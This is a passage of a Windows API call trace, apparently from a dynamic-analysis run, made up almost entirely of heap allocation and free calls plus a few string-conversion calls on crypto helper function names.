dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0042.566] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0042.566] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c22c0 [0042.566] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.566] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0042.566] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0042.566] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0042.566] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0042.566] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0042.566] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0042.566] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b16c0 [0042.566] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da1c8 [0042.566] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1bc0 [0042.566] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0042.566] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0042.566] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da398 [0042.566] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18f35) returned 0xac2018 [0042.566] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0042.566] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da2a8 [0042.566] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 [0042.566] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da348 [0042.566] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0042.567] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da348 [0042.567] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0042.567] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da378 [0042.567] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0042.567] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da378 [0042.567] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0042.567] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da158 [0042.567] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da158 | out: hHeap=0x770000) returned 1 [0042.567] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x889b08 [0042.567] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1760 [0042.567] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce38 [0042.567] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da158 [0042.567] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca48 [0042.567] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da208 [0042.567] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18f35) returned 0x94df48 [0042.568] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c10 [0042.568] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0042.568] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 [0042.568] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0042.568] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a30 [0042.568] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0042.568] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1940 [0042.568] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0042.568] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3f8 [0042.568] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca00 [0042.568] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a80 [0042.568] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897d8 [0042.569] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da278 [0042.569] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb68 [0042.569] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0042.569] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.569] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da408 [0042.569] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0042.569] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da408 [0042.569] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0042.569] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2300 [0042.569] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.569] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19b8 [0042.569] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cf10 [0042.569] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da408 [0042.569] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0042.569] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a08 [0042.569] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cf10 [0042.569] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c898 [0042.569] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3a8 [0042.569] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c898 | out: hHeap=0x770000) returned 1 [0042.569] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da248 [0042.569] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0042.569] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0042.569] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0042.569] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da248 | out: hHeap=0x770000) returned 1 [0042.569] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18a0 [0042.569] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da248 [0042.569] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1800 [0042.569] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c898 [0042.569] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da288 [0042.569] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0042.569] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c928 [0042.569] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1cd8 [0042.570] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce68 [0042.570] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da288 [0042.570] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0042.570] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1aa8 [0042.570] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce68 [0042.570] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0042.570] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0042.570] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b48 [0042.570] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889508 [0042.570] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0042.570] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0042.570] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0042.570] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0042.570] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0042.570] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b15a8 [0042.570] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0042.570] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3e8 [0042.570] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cca0 [0042.570] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3e8 | out: hHeap=0x770000) returned 1 [0042.570] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae988 [0042.570] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3e8 [0042.570] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1670 [0042.570] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0042.570] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e138 [0042.570] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0042.570] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2b8 [0042.570] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc28 [0042.570] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da148 [0042.570] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0042.570] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1a8 [0042.570] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0042.570] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da358 [0042.571] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0042.571] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da238 [0042.571] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0042.571] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da238 | out: hHeap=0x770000) returned 1 [0042.571] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0042.571] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da358 | out: hHeap=0x770000) returned 1 [0042.571] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0042.571] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0042.571] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1a8 [0042.571] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da358 [0042.571] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1670 | out: hHeap=0x770000) returned 1 [0042.571] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3e8 | out: hHeap=0x770000) returned 1 [0042.571] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cca0 | out: hHeap=0x770000) returned 1 [0042.571] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0042.571] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b15a8 | out: hHeap=0x770000) returned 1 [0042.571] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0042.571] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0042.571] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b15a8 [0042.571] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0042.571] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0042.571] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae928 [0042.571] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0042.571] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cca0 [0042.571] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3e8 [0042.571] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0042.571] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da238 [0042.571] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0042.571] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0042.571] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0042.571] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0042.571] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0042.572] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0042.572] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0042.572] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0042.572] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da238 | out: hHeap=0x770000) returned 1 [0042.572] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cca0 | out: hHeap=0x770000) returned 1 [0042.572] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3e8 | out: hHeap=0x770000) returned 1 [0042.572] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0042.572] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0042.572] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0042.572] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0042.572] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0042.572] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b15a8 | out: hHeap=0x770000) returned 1 [0042.572] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0042.572] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b15a8 [0042.572] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0042.572] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3e8 [0042.572] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0042.572] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0042.572] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da238 [0042.572] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0042.572] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1670 [0042.572] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0042.572] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0042.572] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da308 [0042.572] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0042.572] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0042.572] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0042.572] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da308 | out: hHeap=0x770000) returned 1 [0042.572] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cca0 [0042.572] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0042.573] PeekMessageW (in: lpMsg=0x6adcd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6adcd4) returned 0 [0042.573] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da308 [0042.573] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0042.573] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0042.573] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da308 | out: hHeap=0x770000) returned 1 [0042.573] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0042.573] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cca0 | out: hHeap=0x770000) returned 1 [0042.573] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0042.573] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cca0 [0042.573] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0042.573] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0042.573] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0042.573] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9b8 [0042.573] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0042.573] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0042.573] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0042.573] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0042.573] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0042.573] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0042.573] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0042.573] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c730 [0042.573] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0042.573] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0042.573] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0042.573] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0042.573] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0042.573] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0042.573] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0042.573] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0042.573] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0042.573] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c910 [0042.574] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0042.574] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0042.574] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0042.574] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0042.574] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1670 | out: hHeap=0x770000) returned 1 [0042.574] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889778 [0042.574] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0042.574] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1670 [0042.574] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccb8 [0042.574] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da308 [0042.574] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae928 [0042.574] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0042.574] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd30 [0042.574] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da338 [0042.574] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0042.574] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da318 [0042.574] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da308 | out: hHeap=0x770000) returned 1 [0042.574] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c880 [0042.574] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da308 [0042.574] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da308 | out: hHeap=0x770000) returned 1 [0042.574] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0042.574] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0042.574] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0042.574] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0042.574] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0042.574] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0042.574] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0042.574] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c880 | out: hHeap=0x770000) returned 1 [0042.574] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1670 | out: hHeap=0x770000) returned 1 [0042.574] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0042.574] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c880 [0042.575] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0042.575] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccb8 [0042.575] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0042.575] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd30 [0042.575] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0042.575] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1670 [0042.575] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0042.575] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0042.575] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae928 [0042.575] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0042.575] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889220 [0042.575] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da318 [0042.575] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7f0 [0042.575] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da308 [0042.575] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0042.575] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0042.575] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0042.575] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0042.575] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7f0 | out: hHeap=0x770000) returned 1 [0042.575] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da308 | out: hHeap=0x770000) returned 1 